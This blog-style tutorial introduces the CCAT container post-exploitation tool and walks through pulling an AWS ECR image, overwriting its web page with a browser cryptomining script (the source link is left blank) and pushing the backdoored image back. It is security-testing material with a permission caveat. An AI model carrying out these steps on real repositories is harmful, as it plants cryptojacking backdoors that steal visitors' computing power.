Cloud Container Attack Tool (CCAT) and Cryptojacking

Containerization revolutionized cloud computing and modern IT infrastructure. The convenience it has created allows organizations to build, test and deploy software faster. However, container security was not addressed until recently and many are still catching up on tools that secure cloud container environments. The deficiency of such tools is another major concern for developers, which triggered a cloud pentester at Rhino Security Labs, a Washington based boutique penetration testing and security assessment firm, to develop the Cloud Container Attack Tool (also known as CCAT).

The What and How

CCAT is an open source post exploitation framework commonly used to test security of container environments in AWS and GCP platforms. It enables developers to find backdoors and exploits in the container environment.

As mentioned earlier, CCAT is a post exploitation framework which means that it assumes that your credentials or your GCP/ AWS accounts have been compromised. After which, you can explore repositories, pull images from the registry, create backdoors in the image and push them back into the repository. A typical scenario is shown in the image below from GitHub.

Installation of CCAT

One can very easily clone the repository to install CCAT as shown below:

$ git clone

$ cd ccat

Before running CCAT, configure your AWS credentials with your current user. You can refer to this article to learn more about it.

Once it has been installed, type the following command in the CCAT directory:

$ docker run -it -v ~/.aws:/root/.aws/ -v /var/run/docker.sock:/var/run/docker.sock -v 

${PWD}:/app/ rhinosecuritylabs/ccat:latest

CCAT and Cryptojacking

Cryptojacking is yet another reason for malicious actors to target container environments. Cryptojacking is the unauthorized process of accessing an individual’s computer to mine cryptocurrencies.

Crypto mining is a process where a network of computers known as miners solve cryptographic equations for a payment. This procedure is often quite expensive, one which requires a lot of computing power that an ordinary computer cannot handle. There are many browser-based miner mechanisms that can generate the power directly. But as stated above, they are simply not enough.

To overcome this problem, threat actors host malicious websites with javascript code written in it. So that when users visit the website, they can draw the CPU’s power to mine from those users. This way, they successfully carry out cryptojacking. In this blog, I will demonstrate a similar attack with the help of a mining pool.

Mining Pool

A mining pool is simply a group of crypto miners who pool resources over a network, to strengthen their chances at successfully mining for cryptocurrencies. In this demo, we have used Monero cryptocurrencies. To get going, you need to create a Monero wallet address. You can use this link to do it.

Creating a Backdoor on Web App Container

Now let us try to create a backdoor in an existing container. We can use the container dubbed “backdoor-example” that was already pushed to AWS ECR. It is a simple Hello World docker container. The dockerfile commands for the container is as given below:

FROM ubuntu: 18.04

# Install dependencies

RUN apt-get update && \

 apt-get -y install apache2

# Install apache and write hello world message

RUN echo 'Hello World!' > /var/www/html/index.html

# Configure apache

RUN echo '. /etc/apache2/envvars' > /root/ && \

 echo 'mkdir -p /var/run/apache2' >> /root/ && \

 echo 'mkdir -p /var/lock/apache2' >> /root/ && \

 echo '/usr/sbin/apache2 -D FOREGROUND' >> /root/ && \

 chmod 755 /root/


CMD /root/

Now, let’s run the CCAT tool.

  • Firstly, we enumerate ECR repositories to configure the profile. Remember to configure AWS CLI credentials before this:

  • Once we select this option, we enter the AWS profile name as shown below:

  • Now, we select the respective region where the repository is stored.

  • Once you have selected the region, the tool automatically enumerates the repositories. It’s time to list the repositories in a table format.

  • This is the image we were able to create:

  • Now, we pull the repository as shown below, to make changes in the image. You can choose to pull all the enumerated repositories together or single repos:

  • Select the Docker Backdoor option

  • Add all necessary details:

  • Here comes the crucial part. We used the javascript code taken from this GitHub page and overwrote the index.html file accordingly. Make sure to enter the exact pool name and port number.
<script src="" > </script>

  • Once the backdoored docker image is built, we push it.

  • Ensure that you have provided accurate information:

  • We push the repository

At its core, CCAT is an automation tool used in instances of post exploitation attacks. We can perform similar attacks with GCP as well. Be cautious while performing such attacks and only do it in environments where you have permission.

For more information on CCAT, visit GitHub.

1 Like